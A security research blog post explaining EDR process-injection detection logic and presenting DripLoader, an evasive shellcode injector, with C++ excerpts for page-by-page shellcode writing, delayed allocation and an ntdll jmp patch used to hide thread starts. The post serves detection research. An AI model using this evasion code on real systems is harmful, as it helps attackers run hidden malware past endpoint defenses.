Bypassing EDR Real-Time Injection Detection Logic

By Filip Olszak

The blog is not about suppressing event collection, but discovering EDR architecture limitations, in the context of process injection.

Some great posts on bypassing EDR agent collection: Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank) A tale of EDR bypass methods (@s3cur3th1ssh1t) FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec) Hell's Gate (@smelly__vx, @am0nsec) Halo's Gate - twin sister of Hell's Gate (sektor7) Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog) Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode)

Introduction

In the previous post we discussed how solutions that use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from the user-mode. Most notably Microsoft uses that ETW, though there are vendors who do it better.

Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting, which combined give us a technique undetectable by MDATP and many other EDRs out there, as of today.

It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage.

Check out my previous post on detecting process injection with kernel ETW.

T1055 vs EDR

Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass.

It's definitely good to know the product you're using is not able to flag Meterpreter's migrate command and process hollowing procedures from a 5+-year-old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed.

Other than that value of the last evaluation in the context of injections is very limited, and we are not getting the full picture of how much each vendor invests into researching TTPs relevant right now, and in the future, or how robust the detection capability and data sources really are.

While some EDRs were not able to flag on the elementary techniques, many improved detection capabilities to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments, they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance.

We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine.

Let's first discuss all the detection opportunities for anomalous remote thread creation.

CRT anomalies

The API getting the most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel-mode target intercepted through kernel callbacks.

Here we have a basic detection for a specific Windows process - msbuild.exe creating a new thread in a remote process. Even though the criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments.

Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity while keeping noise down to allow their analysts to review and classify the important stuff.

A more generic, custom MDATP thread creation rule-based around the new FileProfile() enrichment function - detects extremely rare files creating threads in remote processes. Very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain.

As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not good enough of an indicator to trigger an alert, and there is more advanced logic in play - true for most decent EDRs.

Understanding correlation

By "detections" and "alerts" I do not just mean labeled activity that can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint.

(I also assume the platform is not incredibly noisy, to the level of it being unusable)

This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most.

On-agent detections, activity, and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties.

We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds.

For the same reason choosing your EDR vendor based on the numerical results of things like the Mitre evaluation and percentage of coverage - is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain, which means the time correlation of labeled events from the host to a single alert is good enough to score 100% coverage.

High fidelity alerts

So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events.

For thread creation, the most common constraint is a thread starting process ≠ hosting process - so monitoring only remote thread creation, usually also limited to those with:

thread start in image "unbacked" MEM_COMMIT-type segment
the size of segment being larger than X

and on a scale this will still generate a very significant amount of false positives, which may lead to further filtering, for example:

thread location (target) only in Windows built-in executables
- only a subset of these
thread initiator (source) only in risky executables
- unknown hashes
- low file prevalence
- risky paths (%userprofile%, %temp% etc.)
- not seen on the network/on the host
memory page contains suspicious stuff

Machine learning models are often employed to attempt solving this issue, and so on - these assumptions will differ for vendors, but the idea is to tame thread creation. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection.

While it is true that for the majority of injection techniques a new thread will be created in the target process at some point, how it's created is often unexpected and makes monitoring infeasible, thus relying exclusively on ntdll!NtCreateThread(Ex) hooking/thread creation callbacks nowadays is an easily exploitable design flaw.

SetThreadContext In case of process hollowing or thread hijacking our target thread has already been created legitimately by the Windows Loader or target application locally, and thus there is nothing to detect upon. This is one of the reasons CobaltStrike execute-assembly uses SetThreadContext instead of CRT injection on the sacrificial process.

Once we have the telemetry, on a scale it's much easier to detect certain SetThreadContext anomalies, than CRT-injection, and today in many environments it generates high criticality alerts, rendering fork&run useless in stealthy offensive ops.

QueueUserAPC Asynchronous Procedure Calls provide another avenue for avoiding thread creation. An APC can be queued for an existing thread, and executed once it enters an alertable state.

In recent years userland hooking evasion is getting a lot of coverage, and Early Bird injection has popularized the use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process before the ntdll!LdrpInitializeProcess function had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process.

Once again this technique becomes easy to detect when we stop relying solely on hooking.

DripLoader

DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection.
The project is aiming to highlight limitations of event-driven injection identification, and show the need for more advanced memory scanning and smarter local agent inventories in EDR.

DripLoader evades EDRs by
using the most risky APIs possible like NtAllocateVirtualMemory and NtCreateThreadEx
blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume
avoiding multi-event correlation by introducing delays

Allocating memory

To bypass any memory allocation based logic we will only commit page granularity, or PageSizesized pages, which on Windows 10 with a modern processor is 4kB:

this constant found in the SYSTEM_INFO structure tells us the lowest possible size of a VM allocation
since most legitimate remote VM operations work on a single, or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on

To accomplish this we need to deal with some inconveniences

we need our shellcode in memory as a continuous byte sequence which means we cannot let kernel32!VirtualAllocEx choose the base, as it might reserve memory at an address where the other allocations will not fit
in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar is rounded up to AllocationGranularity which is another constant found in SYSTEM_INFO and is usually 64kB
- for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 0x40010000 (64kB) region will be unavailable for new allocations

Steps we take

pre-define a list of 64-bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob

const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
                                         (void*)0x0000000010000000,
                                         (void*)0x0000000021000000,
                                         (void*)0x0000000032000000,
                                         (void*)0x0000000043000000,
                                         (void*)0x0000000050000000,
                                         (void*)0x0000000041000000,
                                         (void*)0x0000000042000000,
                                         (void*)0x0000000040000000,
                                         (void*)0x0000000022000000 };
                                       
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
    MEMORY_BASIC_INFORMATION mbi;

    for (auto base : VC_PREF_BASES) {
        VirtualQueryEx(
            hProc,
            base,
            &mbi,
            sizeof(MEMORY_BASIC_INFORMATION)
        );

        if (MEM_FREE == mbi.State) {
            uint64_t i;
            for (i = 0; i < cVmResv; ++i) {
                LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
                VirtualQueryEx(
                    hProc,
                    currentBase,
                    &mbi,
                    sizeof(MEMORY_BASIC_INFORMATION)
                );
                if (MEM_FREE != mbi.State)
                    break;
            }
            if (i == cVmResv) {
                // found suitable base
                return base;
            }
        }
    }
    return nullptr;
}

reserve required number of full AllocationGranularity (64kB) sized regions, and then loop over those committing 4kB pages to ensure page alignment

// MEM_RESERVE, NO_ACCESS, 64kB
for (i = 1; i <= cVmResv; ++i) 
{
    // sleeps here
    ANtAVM(
        hProc,
        &currentVmBase,
        NULL, 
        &szVmResv,
        MEM_RESERVE, 
        PAGE_NOACCESS
    );

    if (STATUS_SUCCESS == status)
        vcVmResv.push_back(currentVmBase);
    else
        return 4;

    currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}

// MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
for (i = 0; i < cVmResv; ++i) 
{
    for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i) 
    {
        DWORD offset = (cmm_i * szVmCmm);
        currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);

        ANtAVM(
            hProc, 
            &currentVmBase, 
            NULL, 
            &szVmCmm, 
            MEM_COMMIT, 
            PAGE_READWRITE
        );
        
        // sleeps here
        
        SIZE_T szWritten{ 0 };
        ANtWVM(
            hProc, 
            currentVmBase, 
            &shellcode[offsetSc], 
            szVmCmm, 
            &szWritten
        );

        offsetSc += szVmCmm;
        
        // sleeps here

        ANtPVM(
            hProc, 
            &currentVmBase, 
            &szVmCmm, 
            PAGE_EXECUTE_READ, 
            &oldProt
        );
    } 
}

The pages are also written to and individually reprotected with each run to avoid a large RegionSize of a target memory page in properties of logged VirtualProtectEx events. (TiEtw provides this, and hooks can too).

Creating the thread

Now that we have our shellcode in the remote process we need to initiate its execution.

To do this we will use the CreateThreadEx native API which is the ntdll target of CRT, and hence very commonly called by legitimate software. To bypass any detections we will:

create the new thread from MEM_IMAGE base address
- moreover, we use a known-good module loaded by the Windows Loader, ntdll.dll
the location will be patched with a far jmp to our shellcode base at the time of thread creation

Note that we do not need to run in a MEM_IMAGE segment, as we only care about logging arguments in the TiEtw/Hook event.

If our shellcode creates a new thread (which would happen for example when using sRDI beacon.dll), the locally created thread won't be tagged on by most EDRs, but it will no longer have ntdll as it's start address which could get it detected by basic Endpoint Protection, and will get it detected by Get-InjectedThread.

Steps we take

figure out RVA of the function we will hijack

// ntdll.dll
char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
// RtlpWow64CtxFromAmd64
char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };

LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
{
    unsigned char* b = (unsigned char*)&vm_base;

    unsigned char jmpSc[7]{
        0xB8, b[0], b[1], b[2], b[3],
        0xFF, 0xE0
    };

    // find the export EP offset
    HMODULE hJmpMod = LoadLibraryExA(
        jmpModName,
        NULL,
        DONT_RESOLVE_DLL_REFERENCES
    );

    if (!hJmpMod)
        return nullptr;

    LPVOID  lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);

    DWORD   offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
    
[...]
}

find the base of remote ntdll and calculate AVA

[...]

    LPVOID  lpRemFuncEP{ 0 };

    HMODULE hMods[1024];
    DWORD   cbNeeded;
    char    szModName[MAX_PATH];
    
    if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
    {
        int i;
        for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
        {
            if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
            {
                if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
                    lpRemFuncEP = hMods[i];
                    break;
                }
            }
        }
    }

    lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
    
[...]

overwrite the function prologue with a jmp

[...]

    if (NULL == lpRemFuncEP)
        return nullptr;

    SIZE_T szWritten{ 0 };
    WriteProcessMemory(
        hProc,
        lpDllExport,
        jmpSc,
        sizeof(jmpSc),
        &szWritten
    );

    return lpDllExport;
}

CreateRemoteThread

The full source and more explanations can be found on GitHub

GitHub - xuanxuan0/DripLoader: Evasive shellcode loader for bypassing event-based injection detection (PoC)GitHub

Result

1. The activity will generate events with the following characteristics

// reservations
VM_ALLOC:
      REMOTE: 1,
      SIZE: 0x10000,
      TYPE: 0x2000,
      PROT: 0x01 (-)


// commits 
VM_ALLOC:
      REMOTE: 1,
      SIZE: 0x1000,
      TYPE: 0x1000,
      PROT: 0x04 (rw)
      
      
VM_WRITE:
      REMOTE: 1,
      SIZE: 0x1000
      
      
THREAD_START:
      REMOTE: 1,
      SUSPENDED: 0,
      ACCMSK: 0xFFFF (full),
      PAGE_TYPE: 0x1000000 (img),
      LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0

2. State of the target process (assuming shellcode does not create thread)

Defense recommendations

Option #1: Monitor injection APIs yourself
- EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
- aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team

PreviousDetecting Process Injection with ETW NextMalware Analysis

Last updated 3 years ago

hashtagIntroduction

hashtagT1055 vs EDR

hashtagCRT anomalies

hashtagUnderstanding correlation

hashtagHigh fidelity alerts

hashtagDripLoader

hashtagAllocating memory

hashtagTo accomplish this we need to deal with some inconveniences

hashtagSteps we take

hashtagCreating the thread

hashtagSteps we take

hashtagResult

hashtagDefense recommendations

Introduction

T1055 vs EDR

CRT anomalies

Understanding correlation

High fidelity alerts

DripLoader

Allocating memory

To accomplish this we need to deal with some inconveniences

Steps we take

Creating the thread

Steps we take

Result

Defense recommendations